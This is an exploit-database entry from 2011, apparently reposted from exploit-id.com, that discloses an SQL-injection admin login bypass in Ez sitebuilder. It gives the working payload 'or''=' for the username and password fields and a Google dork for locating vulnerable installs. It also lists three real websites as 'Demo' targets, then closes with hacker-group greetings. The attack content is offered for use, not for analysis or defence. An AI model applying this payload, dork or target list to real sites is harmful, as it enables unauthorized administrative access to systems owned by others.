Ez sitebuilder <= Admin Auth Bypass Vulnerability

🗓️ 23 Jun 2011 00:00:00Reported by Caddy-DzType

zdt🔗 0day.today👁 31 Views

Ez sitebuilder Admin Auth Bypass Vulnerability disclosed by Caddy-Dz on exploit-id.com. Vulnerable URL: http://127.0.0.1/[path]/id/adminlogin.asp. Username and password: 'or''='. Demo URLs: http://www.pressedleaf.com/site/id/adminlogin.asp, http://www.ez-sitebuilder.com/site/id/adminlogin.asp, http://www.highmarknow.com/site/id/adminlogin.as

=====================================================================
                      .__         .__  __            .__    .___
  ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
_/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ | 
\  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ | 
 \___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ | 
     \/      \/|__|                                          \/  
			Exploit-ID is the Exploit Information Disclosure
 
Web             : exploit-id.com	
e-mail          : root[at]exploit-id[dot]com             
 
            	   	 #########################################			  
		  	   I'm Caddy-Dz, member of Exploit-Id				
		  	 #########################################			  
======================================================================
####
# Exploit Title: Ez sitebuilder <= Admin Auth Bypass Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: [email protected]  |  [email protected]
# Website: www.exploit-id.com
# Category:: webapps
# Google dork: inurl:/id/adminlogin.asp
# Tested on: [Windows Vista Edition IntÃ©gral- France]
####


[+] ExpLo!T:

http://127.0.0.1/[path]/id/adminlogin.asp

[+] Username :  'or''='

[+] Password : 'or''='


[+] Demo :

http://www.pressedleaf.com/site/id/adminlogin.asp

http://www.ez-sitebuilder.com/site/id/adminlogin.asp

http://www.highmarknow.com/site/id/adminlogin.asp



####

[+] Peace From Algeria

####

=================================**Algerians Hackers**=======================================|
# Greets To :                                                                                |
  KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T ,               |
  All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (09exploit.com) ,                 |
  All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , | 
  RmZ ...others                                                                              |
============================================================================================ |



#  0day.today [2018-03-20]  #

23 Jun 2011 00:00Current

7.1High risk

Vulners AI Score7.1